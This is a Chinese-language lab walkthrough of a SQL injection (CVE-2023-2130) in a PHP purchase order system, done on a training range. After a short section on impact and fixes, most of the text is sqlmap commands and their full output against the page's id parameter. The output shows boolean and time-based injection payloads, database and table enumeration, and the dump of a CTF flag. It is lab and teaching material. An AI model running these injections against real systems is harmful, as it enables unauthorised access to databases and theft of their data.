前言
CVE-2023-2130是一个影响SourceCodester Purchase Order Management System v1.0的SQL注入漏洞。此漏洞的存在是由于应用程序未能正确过滤和验证用户输入,使得攻击者可以通过SQL注入来执行任意SQL命令,从而对数据库进行未授权的访问和操作。
在利用此漏洞时,攻击者可以通过在输入字段中插入恶意SQL代码来实现以下目的:
- 获取敏感数据:例如用户凭证、个人信息等。
- 修改或删除数据:可以篡改数据库中的记录或删除数据。
- 执行管理操作:可能获取管理员权限并执行更高级别的操作。
此漏洞的严重性评级为9.8(CVSSv3),属于高危漏洞。为了缓解此漏洞,可以采取以下措施:
- 使用准备好的语句:通过使用准备好的语句和参数化查询,可以有效地防止SQL注入。
- 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只允许合法的输入。
- 最小权限原则:数据库用户应仅具有执行其所需操作的最低权限,避免使用高权限账户执行日常操作。
- 安全编码实践:采用安全编码实践,如使用ORM(对象关系映射)框架来处理数据库操作,避免手动拼接SQL语句。
春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:
实战演练:
提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
漏洞复现:
用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。
教学培训:
提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。
竞赛与评测:
定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。
资源共享:
平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。
春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。
介绍
SourceCodester Purchase Order Management System v1.0 是一个基于Web的应用程序,设计用于简化和管理采购订单流程。该系统主要面向中小企业,以提高采购效率,减少手动处理错误,并保持采购记录的透明和可追踪性。
主要功能
-
用户管理:
- 系统允许管理员添加、编辑和删除用户账户,分配不同的权限级别,以确保只有授权用户才能访问和管理采购订单。
-
供应商管理:
- 用户可以添加和管理供应商信息,包括供应商名称、联系方式和地址。这有助于在采购订单创建时快速选择和联系供应商。
-
采购订单管理:
- 用户可以创建、编辑和查看采购订单。每个订单包括供应商信息、订单日期、交货日期、订单状态和详细的产品列表。
-
产品管理:
- 系统允许添加和管理产品信息,包括产品名称、描述、价格和库存数量。用户可以在创建采购订单时选择产品。
-
报告和记录:
- 提供详细的采购订单报告和历史记录,方便用户查看过去的订单记录和当前的订单状态。
-
通知系统:
- 系统可以发送通知,提醒用户处理新订单或更新订单状态。
技术栈
- 前端:使用HTML、CSS和JavaScript构建,提供用户友好的界面。
- 后端:基于PHP开发,处理业务逻辑和数据库操作。
- 数据库:使用MySQL存储和管理数据,确保数据的持久性和完整性。
安装和运行
要安装和运行SourceCodester Purchase Order Management System v1.0,用户需要:
- Web服务器:如Apache或Nginx。
- PHP环境:确保服务器上安装和配置了PHP。
- 数据库:设置MySQL数据库并导入提供的数据库脚本。
优点
- 简化采购流程:通过系统化管理,提高采购流程的效率和准确性。
- 易于使用:直观的用户界面,使用户能够快速上手。
- 灵活管理:支持多用户和权限管理,确保系统的安全性和灵活性。
SourceCodester Purchase Order Management System v1.0 是一个实用的工具,适合希望优化采购流程的企业和组织
漏洞复现
打开靶场
直接进入是需要登录的
访问漏洞页面如下
传送 id 参数试试
使用 SQLMap 爆库
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" --dbs _____H_____ ___[.]_____ ___ ___ {1.8.4#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:44:28 /2024-07-05/[20:44:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2807ae4e6fb...91fa107729'). Do you want to use those [Y/n] n
[20:44:30] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:44:30] [INFO] testing if the target URL content is stable
[20:44:30] [INFO] target URL content is stable
[20:44:30] [INFO] testing if GET parameter 'id' is dynamic
[20:44:31] [INFO] GET parameter 'id' appears to be dynamic
[20:44:31] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:44:31] [INFO] testing for SQL injection on GET parameter 'id'
[20:44:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:44:31] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[20:44:33] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[20:44:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:44:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:44:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:44:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:44:35] [INFO] testing 'Generic inline queries'
[20:44:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:44:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:44:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:44:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:44:45] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:44:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:44:45] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:44:45] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:44:45] [INFO] target URL appears to have 8 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] n
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:52] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1') and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[20:44:53] [INFO] target URL appears to be UNION injectable with 8 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=2' AND 4461=4461 AND 'TVzr'='TVzrType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:44:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.33
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:44:58] [INFO] fetching database names
[20:44:58] [INFO] fetching number of databases
[20:44:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:44:58] [INFO] retrieved: 4
[20:44:58] [INFO] retrieved: information_schema
[20:45:05] [INFO] retrieved: mysql
[20:45:07] [INFO] retrieved: performance_schema
[20:45:13] [INFO] retrieved: purchase_order_db
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] purchase_order_db[20:45:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'
爆表
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" --tables_____H_____ ___[,]_____ ___ ___ {1.8.4#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:48:52 /2024-07-05/[20:48:52] [INFO] resuming back-end DBMS 'mysql'
[20:48:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=78d32b89ed9...f529d4ed65'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=2' AND 4461=4461 AND 'TVzr'='TVzrType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:48:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:48:53] [INFO] fetching tables for database: 'purchase_order_db'
[20:48:53] [INFO] fetching number of tables for database 'purchase_order_db'
[20:48:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:48:53] [INFO] retrieved: 7
[20:48:54] [INFO] retrieved: item_list
[20:48:57] [INFO] retrieved: users
[20:48:59] [INFO] retrieved: supplier_list
[20:49:04] [INFO] retrieved: po_list
[20:49:07] [INFO] retrieved: system_info
[20:49:11] [INFO] retrieved: fllllaaaag
[20:49:16] [INFO] retrieved: order_items
Database: purchase_order_db
[7 tables]
+---------------+
| fllllaaaag |
| item_list |
| order_items |
| po_list |
| supplier_list |
| system_info |
| users |
+---------------+[20:49:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'
爆字段
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" --columns_____H_____ ___["]_____ ___ ___ {1.8.4#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:50:10 /2024-07-05/[20:50:11] [INFO] resuming back-end DBMS 'mysql'
[20:50:11] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4a6065bd9e1...c4ebe38f25'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=2' AND 4461=4461 AND 'TVzr'='TVzrType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:50:12] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:12] [INFO] fetching columns for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:12] [INFO] retrieved: 2
[20:50:13] [INFO] retrieved: id
[20:50:14] [INFO] retrieved: int(20)
[20:50:18] [INFO] retrieved: flag
[20:50:19] [INFO] retrieved: text
Database: purchase_order_db
Table: fllllaaaag
[2 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| flag | text |
| id | int(20) |
+--------+---------+[20:50:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'
爆数据
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" -C "flag" --dump_____H_____ ___[(]_____ ___ ___ {1.8.4#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:50:39 /2024-07-05/[20:50:40] [INFO] resuming back-end DBMS 'mysql'
[20:50:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=c930771f176...8c2072b16f'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=2' AND 4461=4461 AND 'TVzr'='TVzrType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:50:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:41] [INFO] fetching entries of column(s) 'flag' for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [INFO] fetching number of column(s) 'flag' entries for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:41] [INFO] retrieved: 1
[20:50:42] [INFO] retrieved: flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e}
Database: purchase_order_db
Table: fllllaaaag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e} |
+--------------------------------------------+[20:51:00] [INFO] table 'purchase_order_db.fllllaaaag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/dump/purchase_order_db/fllllaaaag.csv'
[20:51:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'[*] ending @ 20:51:00 /2024-07-05/